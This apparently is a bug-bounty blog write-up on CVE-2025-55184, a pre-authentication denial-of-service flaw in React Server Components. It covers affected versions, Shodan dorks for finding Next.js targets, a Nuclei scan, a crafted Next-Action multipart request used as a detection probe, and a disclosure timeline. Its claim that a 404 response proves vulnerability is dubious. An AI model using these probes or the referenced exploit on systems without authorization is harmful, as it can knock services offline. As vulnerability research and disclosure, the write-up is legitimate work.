Disclaimer

The content provided in this article is for educational and informational purposes only. Always ensure you have proper authorization before conducting security assessments. Use this information responsibly.

Introduction

CVE-2025–55184 is a pre-authentication Denial-of-Service (DoS) vulnerability affecting React Server Components (RSC) across multiple 19.x releases. The flaw allows a remote attacker to send a specially crafted HTTP request that causes the server process to enter an infinite loop, resulting in sustained CPU exhaustion and complete service unavailability. Because exploitation does not require authentication, the vulnerability significantly increases the attack surface for exposed applications.

None

This issue primarily impacts modern React-based frameworks that expose Server Function endpoints over HTTP, making it especially relevant for production deployments using server-side rendering and streaming architectures.

CVSS Score: 7.5 (High) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Severity: P2/High (for some applications it may be treated as P3/Medium)

Why this vulnerability matters?

Unlike traditional DoS vulnerabilities that rely on traffic amplification or brute-force resource exhaustion, CVE-2025–55184 exploits a logical flaw in request handling. A single crafted payload can reliably hang the server process, making the attack low-cost and highly effective. In real-world environments, this can lead to prolonged downtime, failed health checks, cascading restarts, and potential SLA violations.

This vulnerability is framework-exploitable rather than library-exploitable, as it requires an HTTP-exposed React Server Components runtime with Server Function deserialization.

How the vulnerability works?

React Server Components introduce Server Functions, which can be invoked via HTTP requests and are internally reconstructed through a deserialization process. In vulnerable versions, this deserialization logic does not safely handle malformed or malicious payloads.

An attacker can craft a request that triggers an unexpected control flow during deserialization, causing the runtime to enter an infinite loop. Once triggered:

The Node.js process consumes excessive CPU

The event loop becomes blocked

Legitimate requests are no longer processed

The application remains unavailable until manually restarted or killed

Because the issue occurs before authentication checks, any publicly reachable Server Function endpoint is susceptible.

Affected components and versions

The vulnerability impacts the following React Server Components packages:

react-server-dom-webpack

react-server-dom-parcel

react-server-dom-turbopack

Vulnerable versions

19.0.0, 19.0.1

19.1.0, 19.1.1, 19.1.2

19.2.0, 19.2.1

Earlier patch attempts were later found to be incomplete, which required additional backported fixes.

Fixed versions

react-server-dom-webpack19.0.3+

react-server-dom-parcel19.1.4+

react-server-dom-turbopack19.2.3+

Upgrading to these versions fully mitigates the issue.

Next.js impact

Applications built using the Next.js App Router are affected because they expose React Server Components Server Functions over HTTP by default.

Pages Router applications are not affected, but upgrading is still recommended to ensure all transitive dependencies are patched.

Refer the security patch for more details.

Now, let's get into finding and exploiting the vulnerable targets.

Target Discovery (Using Shodan)

Using asset discovery services like Shodan is the quickest method to scale your hunting.

Shodan
http.component:"Next.js"

If you have a specific target in mind, then you can use it this way:

Shodan
http.component:"Next.js" ssl.cert.subject.CN:"*.target.com"

Once you have found a few targets, next step is to scan and get an idea of which of those targets are actually vulnerable to this CVE.

Passive Detection

Visit each and every target and use tools like Wappalyzer or Whatweb to discover the technologies and the versions used.

Whatweb
whatweb https://www.target.com

This approach is best when you have minimal no. of targets.

Automated Detection

Use extensions like Link Extractor to get all links from the page. Store those links in a txt file. The extracted URLs can then be supplied directly to Nuclei for focused validation:

Nuclei
nuclei -l extracted_links.txt -t cves/2025/CVE-2025-55184.yaml

There is a community curated template for the detection of this CVE.

Manual Detection (Using Burp Suite)

Assume we have a possible target, say https://www.target.com which is vulnerable to this CVE. Open Burp Suite and go to proxy tab. Using Burp Suite, capture a request to the site and send it to Repeater (Using Ctrl + r).

The request would look like this:

GET / HTTP/2
Host: www.target.com
Cookie: <REDACTED>
Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: <REDACTED>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
If-None-Match: "h9s7rosx4z88y"
Priority: u=0, i

Change this to the request below:

GET / HTTP/2
Host: www.target.com
Next-Action: x
Accept: /
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------974767299852498929531610575
Content-Length: 168

-----------------------------974767299852498929531610575
Content-Disposition: form-data; name="0"

"$@0"
-----------------------------974767299852498929531610575--

The output shows 404 NOT Found and says "Server action not found."

HTTP/2 404 Not Found
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
X-Nextjs-Action-Not-Found: 1
Content-Type: text/plain
X-Nextjs-Cache: HIT
X-Nextjs-Prerender: 1
Etag: "bllcvpkueto"
Content-Length: 24
Date: Wed, 24 Dec 2025 15:13:58 GMT
Set-Cookie: c911f0d5ef992151c0b162990d8c2ffb=c002b8ef8302a67a315f535c3956a39c; path=/; HttpOnly; Secure; SameSite=None
X-Envoy-Upstream-Service-Time: 4
X-Ratelimit-Limit: 2000
X-Ratelimit-Observed: 1
X-Rp-Ss1-Name: prd-rcdn-101-88tvt-ext-kube-rp-lb-6cp9f
Strict-Transport-Security: max-age=31536000; include SubDomains; preload;

Server action not found.

This shows the website is vulnerable to CVE-2025–55184.

Public Exploit

A public proof-of-concept (PoC) demonstrating CVE-2025-55184 is available on GitHub:

cybertechajju/CVE-2025–55184-POC-Expolit

The repository showcases how a crafted request targeting React Server Components Server Function deserialization can reliably trigger the denial-of-service condition described in this vulnerability.

Important caution

⚠️ This PoC causes service disruption. Because CVE-2025-55184 results in an infinite loop and CPU exhaustion, running the exploit against a live application will render the service unavailable.

Reporting This Bug in a Real Application

While assessing a production website, I came across this issue in a real application of Cisco. The organization had an official Vulnerability Disclosure Program (VDP) hosted on Bugcrowd, which allowed the issue to be reported responsibly through an authorized and coordinated disclosure process.

None
Hall of Fame

Disclosure timeline

  • 2025–12–16 — Vulnerability discovered 🔍
  • 2025–12–16 — Report submitted via Bugcrowd VDP 📩
  • 2025–12–29 — Report acknowledged and triaged 🛠️
  • 2026–01–05 — Fix implemented by the organization ✅
  • 2026–01–05 — Issue verified as resolved and closed 🔒
  • 2026–01–05 — Added to the Hall of Fame 🏆

Conclusion

CVE-2025–55184 serves as a reminder that modern server-side abstractions can significantly expand the attack surface when not carefully secured, making timely patching and framework updates essential for maintaining application availability — especially in ecosystems like Next.js.

Happy hacking 🚀